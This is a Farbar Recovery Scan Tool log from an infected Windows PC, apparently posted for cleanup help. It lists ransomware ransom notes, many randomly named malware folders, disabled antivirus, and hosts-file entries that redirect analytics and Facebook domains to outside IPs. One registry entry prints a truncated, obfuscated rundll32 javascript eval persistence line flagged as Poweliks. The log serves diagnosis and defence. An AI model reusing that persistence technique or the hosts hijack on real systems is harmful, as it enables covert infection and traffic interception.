2015-02-20 06:09 - 2014-07-23 15:56 - 00000000 ____D () C:\Program Files (x86)\Java
2015-02-20 06:07 - 2014-07-23 15:56 - 00272296 _____ (Oracle Corporation) C:\WINDOWS\SysWOW64\javaws.exe
2015-02-20 06:07 - 2014-07-23 15:56 - 00176552 _____ (Oracle Corporation) C:\WINDOWS\SysWOW64\javaw.exe
2015-02-20 06:07 - 2014-07-23 15:56 - 00176552 _____ (Oracle Corporation) C:\WINDOWS\SysWOW64\java.exe
2015-02-20 06:07 - 2014-07-23 15:56 - 00098216 _____ (Oracle Corporation) C:\WINDOWS\SysWOW64\WindowsAccessBridge-32.dll
2015-02-20 02:17 - 2014-10-14 10:30 - 00000000 ____D () C:\Windows.old
2015-02-19 23:30 - 2014-09-07 12:01 - 00000000 ____D () C:\Users\Public\CyberLink
2015-02-19 23:28 - 2014-11-14 15:44 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Adhoxi
2015-02-19 23:28 - 2014-07-23 15:49 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\unpacked23206
2015-02-19 23:28 - 2014-07-23 09:13 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Adobe
2015-02-19 23:28 - 2014-07-23 09:09 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Hewlett-Packard
2015-02-19 23:23 - 2014-11-10 16:42 - 00000000 ____D () C:\Users\Dorothy01\AppData\Local\Ovics
2015-02-19 23:21 - 2014-10-14 13:14 - 00000000 ____D () C:\Users\Dorothy01\AppData\Local\AMD
2015-02-19 23:21 - 2014-08-11 11:56 - 00000000 ____D () C:\Users\Dorothy01\AppData\Local\Apple Computer
2015-02-19 22:45 - 2014-11-26 18:24 - 00000000 ____D () C:\ProgramData\bamgaq
2015-02-19 22:11 - 2014-11-07 11:27 - 00000000 ____D () C:\Users\Dorothy01\AppData\Local\{30112b75-e574-a6db-560c-8103291a0838}
2015-02-19 21:07 - 2014-12-03 17:38 - 00000000 ____D () C:\ProgramData\PenulErhig
2015-02-19 07:40 - 2015-01-13 16:26 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Kuseyd
2015-02-19 07:40 - 2015-01-13 16:26 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Guhyanmo
2015-02-19 07:40 - 2015-01-06 13:58 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Veepme
2015-02-19 07:40 - 2015-01-05 20:36 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Kybeuv
2015-02-19 07:40 - 2015-01-05 15:02 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Wiudiz
2015-02-19 07:40 - 2015-01-02 12:19 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Tapyara
2015-02-19 07:40 - 2014-12-26 17:52 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Rifiewyn
2015-02-19 07:40 - 2014-12-25 17:44 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ynopqual
2015-02-19 07:40 - 2014-12-25 15:54 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ihywkead
2015-02-19 07:40 - 2014-12-25 15:43 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ekmiys
2015-02-19 07:40 - 2014-12-23 15:28 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Maypyz
2015-02-19 07:40 - 2014-12-22 15:27 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Fuwutee
2015-02-19 07:40 - 2014-12-22 14:56 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Fyarxy
2015-02-19 07:40 - 2014-12-21 15:20 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Zekubuab
2015-02-19 07:40 - 2014-12-15 16:15 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Wuwuec
2015-02-19 07:40 - 2014-12-14 15:11 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Byloaq
2015-02-19 07:40 - 2014-12-12 15:35 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Yhohybe
2015-02-19 07:40 - 2014-12-11 21:23 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Hovoote
2015-02-19 07:40 - 2014-12-11 16:09 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Amcyocut
2015-02-19 07:40 - 2014-12-11 09:47 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Itsefo
2015-02-19 07:40 - 2014-12-08 17:45 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Tumiexcu
2015-02-19 07:40 - 2014-12-08 16:37 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ziqeexew
2015-02-19 07:40 - 2014-12-04 15:16 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Mawywopo
2015-02-19 07:40 - 2014-12-03 17:42 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Icxeewhu
2015-02-19 07:40 - 2014-12-03 13:46 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ucucni
2015-02-19 07:40 - 2014-12-02 18:10 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Edutsoix
2015-02-19 07:40 - 2014-12-01 10:45 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ruyxku
2015-02-19 07:40 - 2014-12-01 10:45 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Huqokayx
2015-02-19 07:40 - 2014-12-01 10:42 - 00000000 ____D () C:\ProgramData\TifwIdyo
2015-02-19 07:40 - 2014-12-01 10:42 - 00000000 ____D () C:\ProgramData\BolsiWelug
2015-02-19 07:40 - 2014-11-28 08:56 - 00000000 ____D () C:\ProgramData\PeboZnoli
2015-02-19 07:40 - 2014-11-28 08:56 - 00000000 ____D () C:\ProgramData\CecuSefki
2015-02-19 07:40 - 2014-11-24 20:33 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Itufefv
2015-02-19 07:40 - 2014-11-24 20:28 - 00000000 ____D () C:\ProgramData\FapziGguzq
2015-02-19 07:40 - 2014-11-23 15:14 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Senyzayr
2015-02-19 07:40 - 2014-11-23 15:09 - 00000000 ____D () C:\ProgramData\QiktiWuffu
2015-02-19 07:40 - 2014-11-23 15:09 - 00000000 ____D () C:\ProgramData\FadyOdyu
2015-02-19 07:40 - 2014-11-23 08:58 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Zacosia
2015-02-19 07:40 - 2014-11-23 08:53 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ecqootfi
2015-02-19 07:40 - 2014-11-23 08:43 - 00000000 ____D () C:\ProgramData\TixoZuwu
2015-02-19 07:40 - 2014-11-20 15:57 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ymqiuky
2015-02-19 07:40 - 2014-11-20 15:57 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Qaedxa
2015-02-19 07:40 - 2014-11-20 15:54 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Hyipfy
2015-02-19 07:40 - 2014-11-20 15:49 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\FrameworkUpdate
2015-02-19 07:40 - 2014-11-20 15:49 - 00000000 ____D () C:\ProgramData\EiniHubex
2015-02-19 07:40 - 2014-11-19 16:07 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Woakduwa
2015-02-19 07:40 - 2014-11-19 16:07 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Obmukany
2015-02-19 07:40 - 2014-11-19 16:03 - 00000000 ____D () C:\ProgramData\GuxeXowi
2015-02-19 07:40 - 2014-11-18 15:30 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Gynika
2015-02-19 07:40 - 2014-11-18 15:30 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Egewtoi
2015-02-19 07:40 - 2014-11-18 15:26 - 00000000 ____D () C:\ProgramData\MokeVike
2015-02-19 07:40 - 2014-11-17 19:11 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Pevyliu
2015-02-19 07:40 - 2014-11-17 19:11 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ciokov
2015-02-19 07:40 - 2014-11-17 19:07 - 00000000 ____D () C:\ProgramData\MesmAyof
2015-02-19 07:40 - 2014-11-17 10:10 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ohvyev
2015-02-19 07:40 - 2014-11-17 10:10 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Esisgyl
2015-02-19 07:40 - 2014-11-17 10:05 - 00000000 ____D () C:\ProgramData\LuqePana
2015-02-19 07:40 - 2014-11-16 11:38 - 00000000 ____D () C:\ProgramData\YuctAren
2015-02-19 07:40 - 2014-11-16 11:38 - 00000000 ____D () C:\ProgramData\GiqyoCxuko
2015-02-19 07:40 - 2014-11-16 11:02 - 00000000 ____D () C:\ProgramData\JoheMsum
2015-02-19 07:40 - 2014-11-16 11:02 - 00000000 ____D () C:\ProgramData\JahebSuhvo
2015-02-19 07:40 - 2014-11-15 11:27 - 00000000 ____D () C:\ProgramData\HozbEzpud
2015-02-19 07:40 - 2014-11-15 11:27 - 00000000 ____D () C:\ProgramData\FasuTuhu
2015-02-19 07:40 - 2014-11-14 15:44 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ytbynede
2015-02-19 07:40 - 2014-11-14 15:40 - 00000000 ____D () C:\ProgramData\NeheQiri
2015-02-19 07:40 - 2014-11-14 15:40 - 00000000 ____D () C:\ProgramData\KaseJolmi
2015-02-19 07:40 - 2014-11-13 18:25 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ezrydu
2015-02-19 07:40 - 2014-11-13 18:21 - 00000000 ____D () C:\ProgramData\UardiNdeca
2015-02-19 07:40 - 2014-11-13 10:22 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Sequefb
2015-02-19 07:40 - 2014-11-13 10:22 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Onpyym
2015-02-19 07:40 - 2014-11-13 10:17 - 00000000 ____D () C:\ProgramData\UopiJowv
2015-02-19 07:40 - 2014-11-13 10:17 - 00000000 ____D () C:\ProgramData\DervUvon
2015-02-19 07:40 - 2014-11-12 17:45 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ezupuhaf
2015-02-19 07:40 - 2014-11-12 17:40 - 00000000 ____D () C:\ProgramData\PokuGehos
2015-02-19 07:40 - 2014-11-12 17:40 - 00000000 ____D () C:\ProgramData\NerxElyo
2015-02-19 07:40 - 2014-11-11 20:48 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Upvukyy
2015-02-19 07:40 - 2014-11-11 20:47 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Olaqduqo
2015-02-19 07:40 - 2014-11-11 20:42 - 00000000 ____D () C:\ProgramData\PapoSutul
2015-02-19 07:40 - 2014-11-11 20:42 - 00000000 ____D () C:\ProgramData\MoruYemq
2015-02-19 07:40 - 2014-11-11 18:14 - 00000000 ____D () C:\ProgramData\JufhEnusi
2015-02-19 07:40 - 2014-11-10 16:29 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\FrameworkUpdate7
2015-02-19 07:40 - 2014-11-10 16:29 - 00000000 ____D () C:\ProgramData\YansAjfir
2015-02-19 07:40 - 2014-11-10 16:29 - 00000000 ____D () C:\ProgramData\KitpUxijo
2015-02-19 07:40 - 2014-11-07 17:00 - 00000000 ____D () C:\Users\Dorothy01\AppData\Local\Ugmedia
2015-02-19 07:40 - 2014-11-07 16:59 - 00000000 ____D () C:\ProgramData\XiceNnar
2015-02-19 07:40 - 2014-11-07 16:59 - 00000000 ____D () C:\ProgramData\TobaFisa
2015-02-19 07:40 - 2014-10-02 15:49 - 00000000 ____D () C:\Users\Dorothy01\AppData\Local\tmp1461
2015-02-19 01:24 - 2014-10-14 10:31 - 00000000 ___DC () C:\WINDOWS\Panther
2015-02-19 01:18 - 2014-11-11 16:55 - 00000000 ____D () C:\WINDOWS\Minidump
2015-02-15 08:13 - 2013-08-22 07:25 - 00262144 ___SH () C:\WINDOWS\system32\config\ELAM
2015-02-01 20:32 - 2014-11-10 16:30 - 00000648 _____ () C:\ProgramData\@system.temp
2015-02-01 20:32 - 2014-11-10 16:30 - 00000384 ____H () C:\ProgramData\@system3.att
2015-02-01 15:57 - 2015-01-14 07:56 - 00020480 ___SH () C:\Users\Dorothy01\Desktop\Thumbs.db
 
==================== Files in the root of some directories =======
 
2014-11-13 18:51 - 2015-01-07 09:58 - 0000288 _____ () C:\Users\Dorothy01\AppData\Roaming\1B477081.reg
2014-11-21 18:59 - 2014-11-21 18:59 - 0022327 _____ () C:\Users\Dorothy01\AppData\Roaming\893686b8
2011-07-11 21:06 - 2011-07-11 21:06 - 0212304 _____ (Microsoft Corporation) C:\Users\Dorothy01\AppData\Roaming\BtvStack.dll
2015-01-05 14:15 - 2015-01-05 14:15 - 0015872 _____ () C:\Users\Dorothy01\AppData\Roaming\cowitches.d
2014-11-12 18:01 - 2014-11-12 18:01 - 0008542 _____ () C:\Users\Dorothy01\AppData\Roaming\DECRYPT_INSTRUCTION.HTML
2014-11-12 18:01 - 2014-11-12 18:01 - 0004214 _____ () C:\Users\Dorothy01\AppData\Roaming\DECRYPT_INSTRUCTION.TXT
2015-01-12 15:11 - 2015-01-12 15:11 - 0008562 _____ () C:\Users\Dorothy01\AppData\Roaming\HELP_DECRYPT.HTML
2015-01-12 15:11 - 2015-01-12 15:11 - 0001270 _____ () C:\Users\Dorothy01\AppData\Roaming\HELP_DECRYPT.PNG
2015-01-12 15:11 - 2015-01-12 15:11 - 0004224 _____ () C:\Users\Dorothy01\AppData\Roaming\HELP_DECRYPT.TXT
2014-11-13 18:51 - 2015-01-07 09:58 - 0009728 _____ () C:\Users\Dorothy01\AppData\Roaming\mcp.ico
2014-07-23 15:49 - 2014-07-23 15:49 - 0000043 _____ () C:\Users\Dorothy01\AppData\Roaming\WB.CFG
2014-11-10 16:30 - 2014-11-10 16:30 - 0000448 ____H () C:\Users\Dorothy01\AppData\Roaming\麽鎒駓覜
2014-11-21 18:59 - 2014-11-21 18:59 - 0037439 _____ () C:\Users\Dorothy01\AppData\Local\893686b8
2014-11-12 18:01 - 2014-11-12 18:01 - 0008542 _____ () C:\Users\Dorothy01\AppData\Local\DECRYPT_INSTRUCTION.HTML
2014-11-12 18:01 - 2014-11-12 18:01 - 0004214 _____ () C:\Users\Dorothy01\AppData\Local\DECRYPT_INSTRUCTION.TXT
2014-12-11 09:44 - 2014-12-11 21:24 - 0929536 _____ () C:\Users\Dorothy01\AppData\Local\f5e83w4ef.dat
2015-01-12 15:10 - 2015-01-12 15:10 - 0008562 _____ () C:\Users\Dorothy01\AppData\Local\HELP_DECRYPT.HTML
2015-01-12 15:10 - 2015-01-12 15:10 - 0001270 _____ () C:\Users\Dorothy01\AppData\Local\HELP_DECRYPT.PNG
2015-01-12 15:10 - 2015-01-12 15:10 - 0004224 _____ () C:\Users\Dorothy01\AppData\Local\HELP_DECRYPT.TXT
2015-02-19 21:07 - 2015-02-19 21:07 - 0023552 _____ () C:\Users\Dorothy01\AppData\Local\pckunie.dll
2015-02-21 03:30 - 2015-02-21 03:30 - 0023552 _____ () C:\Users\Dorothy01\AppData\Local\pgkunge.dll
2014-11-21 18:59 - 2014-11-21 18:59 - 0026477 _____ () C:\ProgramData\893686b8
2014-11-10 16:30 - 2015-02-01 20:32 - 0000648 _____ () C:\ProgramData\@system.temp
2014-11-10 16:30 - 2015-02-01 20:32 - 0000384 ____H () C:\ProgramData\@system3.att
2015-01-12 15:09 - 2015-01-12 15:09 - 0008562 _____ () C:\ProgramData\HELP_DECRYPT.HTML
2015-01-12 15:09 - 2015-01-12 15:09 - 0001270 _____ () C:\ProgramData\HELP_DECRYPT.PNG
2015-01-12 15:09 - 2015-01-12 15:09 - 0004224 _____ () C:\ProgramData\HELP_DECRYPT.TXT
2012-09-01 00:08 - 2012-09-01 00:08 - 0000141 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.351.64.bc
 
Files to move or delete:
====================
C:\Users\Dorothy01\AppData\Local\Temp\getmhost.exe
 
 
Some content of TEMP:
====================
C:\Users\Dorothy01\AppData\Local\Temp\ARS.exe
C:\Users\Dorothy01\AppData\Local\Temp\dllnt_dump.dll
C:\Users\Dorothy01\AppData\Local\Temp\getmhost.exe
C:\Users\Dorothy01\AppData\Local\Temp\ivbhim.exe
C:\Users\Dorothy01\AppData\Local\Temp\jre-8u31-windows-au.exe
C:\Users\Dorothy01\AppData\Local\Temp\Quarantine.exe
C:\Users\Dorothy01\AppData\Local\Temp\sqlite3.dll
C:\Users\Dorothy01\AppData\Local\Temp\tmp7A9C.tmp.exe
 
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2014-10-14 09:32
 
==================== End Of Log ============================
 
ADDITIONAL SCAN
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 21-02-2015
Ran by Dorothy01 at 2015-02-21 22:42:35
Running from C:\Users\Dorothy01\Desktop
Boot Mode: Normal
==========================================================
 
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Norton Internet Security (Disabled - Up to date) {53C7D717-52E2-B95E-FA61-6F32ECC805DB}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Norton Internet Security (Disabled - Up to date) {E8A636F3-74D8-B6D0-C0D1-5440974F4F66}
FW: Norton Internet Security (Disabled) {6BFC5632-188D-B806-D13E-C607121B42A0}
 
==================== Installed Programs ======================
 
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
4 Elements II (x32 Version: 2.2.0.98 - WildTangent) Hidden
AMD Catalyst Install Manager (HKLM\...\{5F769CF4-5263-4C7B-AEB2-C06A73AE4428}) (Version: 8.0.881.0 - Advanced Micro Devices, Inc.)
Apple Application Support (HKLM-x32\...\{78002155-F025-4070-85B3-7C0453561701}) (Version: 3.0.6 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{6AF2AC2A-3532-43FD-9F4D-BDC9C0D724C7}) (Version: 7.1.2.6 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Avast Free Antivirus (HKLM-x32\...\Avast) (Version: 10.0.2208 - AVAST Software)
Bejeweled 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Build-a-lot 4 - Power Source (x32 Version: 2.2.0.98 - WildTangent) Hidden
Catalyst Control Center (HKLM-x32\...\WUCCCApp) (Version: 1.00.0000 - AMD)
CCleaner (HKLM\...\CCleaner) (Version: 5.02 - Piriform)
Chuzzle Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden
Cradle Of Egypt Collector's Edition (x32 Version: 2.2.0.98 - WildTangent) Hidden
Cradle of Rome 2 (x32 Version: 2.2.0.98 - WildTangent) Hidden
CyberLink LabelPrint (HKLM-x32\...\InstallShield_{C59C179C-668D-49A9-B6EA-0121CCFC1243}) (Version: 2.5.1.5510 - CyberLink Corp.)
CyberLink Media Suite 10 (HKLM-x32\...\InstallShield_{1FBF6C24-C1fD-4101-A42B-0C564F9E8E79}) (Version: 10.0.1.1916 - CyberLink Corp.)
CyberLink PhotoDirector (HKLM-x32\...\InstallShield_{4862344A-A39C-4897-ACD4-A1BED5163C5A}) (Version: 2.0.1.3109 - CyberLink Corp.)
CyberLink Power2Go 8 (HKLM-x32\...\InstallShield_{2A87D48D-3FDF-41fd-97CD-A1E370EFFFE2}) (Version: 8.0.1.1902 - CyberLink Corp.)
CyberLink PowerDirector 10 (HKLM-x32\...\InstallShield_{B0B4F6D2-F2AE-451A-9496-6F2F6A897B32}) (Version: 10.0.1.1925 - CyberLink Corp.)
CyberLink PowerDVD (HKLM-x32\...\InstallShield_{DEC235ED-58A4-4517-A278-C41E8DAEAB3B}) (Version: 10.0.1.4407 - CyberLink Corp.)
CyberLink YouCam (HKLM-x32\...\InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}) (Version: 3.5.4.5527 - CyberLink Corp.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Energy Star (HKLM\...\{0FA995CC-C849-4755-B14B-5404CC75DC24}) (Version: 1.0.8 - Hewlett-Packard)
Farm Frenzy (x32 Version: 2.2.0.98 - WildTangent) Hidden
FATE: The Cursed King (x32 Version: 2.2.0.97 - WildTangent) Hidden
Final Drive Fury (x32 Version: 2.2.0.95 - WildTangent) Hidden
FlatOut 2 (x32 Version: 2.2.0.98 - WildTangent) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 40.0.2214.115 - Google Inc.)
Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.5111.1712 - Google Inc.)
Google Update Helper (x32 Version: 1.3.21.169 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.26.9 - Google Inc.) Hidden
Governor of Poker 2 Premium Edition (x32 Version: 2.2.0.95 - WildTangent) Hidden
Hewlett-Packard ACLM.NET v1.2.0.0 (x32 Version: 1.00.0000 - Hewlett-Packard Company) Hidden
Hoyle Card Games (x32 Version: 2.2.0.95 - WildTangent) Hidden
HP Connected Music (Meridian - installer) (HKLM-x32\...\StartHPConnectedMusic) (Version: v1.0 - Meridian Audio Ltd)
HP Connected Remote (HKLM-x32\...\{F243A34B-AB7F-4065-B770-B85B767C247C}) (Version: 1.0.1202 - Hewlett-Packard)
HP Games (HKLM-x32\...\WildTangent hp Master Uninstall) (Version: 1.0.3.0 - WildTangent)
HP MyRoom (HKLM-x32\...\{9C35EDE5-4B0F-45E7-A438-314BA889948E}) (Version: 9.0.0.0 - Hewlett-Packard Company)
HP Registration Service (HKLM\...\{E4D6CCF2-0AAF-4B9C-9DE5-893EDC9B4BAA}) (Version: 1.0.5976.4186 - Hewlett-Packard)
HP Support Assistant (HKLM-x32\...\{FF27F674-821E-4BA2-985B-DDF539C2CD03}) (Version: 7.0.33.6 - Hewlett-Packard Company)
HP Support Information (HKLM-x32\...\{B2B7B1C8-7C8B-476C-BE2C-049731C55992}) (Version: 12.00.0000 - Hewlett-Packard)
iscsicli (HKLM\...\{f48a0c57-7c48-461c-9957-ab255ddc986e}.sdb) (Version:  - )
iTunes (HKLM\...\{77DE5105-D05E-448C-96CB-7FA381903753}) (Version: 11.3.1.2 - Apple Inc.)
Java 8 Update 31 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218031F0}) (Version: 8.0.310 - Oracle Corporation)
Jewel Match 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden
John Deere Drive Green (x32 Version: 2.2.0.95 - WildTangent) Hidden
Luxor Evolved (x32 Version: 2.2.0.98 - WildTangent) Hidden
Mahjongg Dimensions Deluxe: Tiles in Time (x32 Version: 2.2.0.98 - WildTangent) Hidden
Malwarebytes Anti-Malware version 2.0.4.1028 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.4.1028 - Malwarebytes Corporation)
Microsoft Office (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.6120.5004 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.50727 (HKLM-x32\...\{15134cb0-b767-4960-a911-f2d16ae54797}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727 (HKLM-x32\...\{22154f09-719a-4619-bb71-5b3356999fbf}) (Version: 11.0.50727.1 - Microsoft Corporation)
Mortimer Beckett and the Crimson Thief Premium Edition (x32 Version: 2.2.0.98 - WildTangent) Hidden
Mystery P.I. - Curious Case of Counterfeit Cove (x32 Version: 2.2.0.98 - WildTangent) Hidden
Norton Internet Security (HKLM-x32\...\NIS) (Version: 20.6.0.27 - Symantec Corporation)
Peggle Nights (x32 Version: 2.2.0.98 - WildTangent) Hidden
Penguins! (x32 Version: 2.2.0.98 - WildTangent) Hidden
Polar Bowler (x32 Version: 2.2.0.97 - WildTangent) Hidden
Polar Golfer (x32 Version: 2.2.0.98 - WildTangent) Hidden
Ralink RT5390R 802.11bgn Wi-Fi Adapter (HKLM-x32\...\{8FC4F1DD-F7FD-4766-804D-3C8FF1D309AF}) (Version: 5.0.0.0 - Ralink)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6675 - Realtek Semiconductor Corp.)
Realtek PCIE Card Reader (HKLM-x32\...\{C1594429-8296-4652-BF54-9DBE4932A44C}) (Version: 6.2.8400.28123 - Realtek Semiconductor Corp.)
Recovery Manager (x32 Version: 5.5.0.5530 - CyberLink Corp.) Hidden
Roads of Rome 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden
StarmIRC 3.0 (HKLM-x32\...\StarmIRC 3.0) (Version:  - )
StarPircH v3.0 (HKLM-x32\...\StarPircH v3.0) (Version:  - )
Tales of Lagoona (x32 Version: 2.2.0.110 - WildTangent) Hidden
Update Installer for WildTangent Games App (x32 Version:  - WildTangent) Hidden
Vacation Quest™ - Australia (x32 Version: 2.2.0.98 - WildTangent) Hidden
WildTangent Games (HKLM-x32\...\WildTangent wildgames Master Uninstall) (Version: 1.0.3.0 - WildTangent)
WildTangent Games App (x32 Version: 4.0.9.6 - WildTangent) Hidden
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3555.0308 - Microsoft Corporation)
ZTE Handset USB Driver (HKLM\...\{01D42BF0-ED08-463f-8A28-99EB6FEE962B}) (Version:  - ZTE Corporation)
ZTE Handset USB Driver (HKLM\...\{D2D77DC2-8299-11D1-8949-444553540000}_is1) (Version: 5.2104.1.01B01 - ZTE Corporation)
Zuma's Revenge (x32 Version: 2.2.0.98 - WildTangent) Hidden
 
==================== Custom CLSID (selected items): ==========================
 
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
 
CustomCLSID: HKU\S-1-5-21-1427692388-1042374531-2795145444-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 251 more characters). <==== Poweliks?
 
==================== Restore Points  =========================
 
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2013-08-22 07:25 - 2015-02-21 03:31 - 00001509 _RASH C:\WINDOWS\system32\Drivers\etc\hosts
127.0.0.1       localhost
195.162.68.59 www.google-analytics.com.
195.162.68.59 google-analytics.com.
195.162.68.59 connect.facebook.net.
162.247.13.54 www.google-analytics.com.
162.247.13.54 google-analytics.com.
162.247.13.54 connect.facebook.net.
195.162.69.252 www.google-analytics.com.
195.162.69.252 google-analytics.com.
195.162.69.252 connect.facebook.net.
 
 
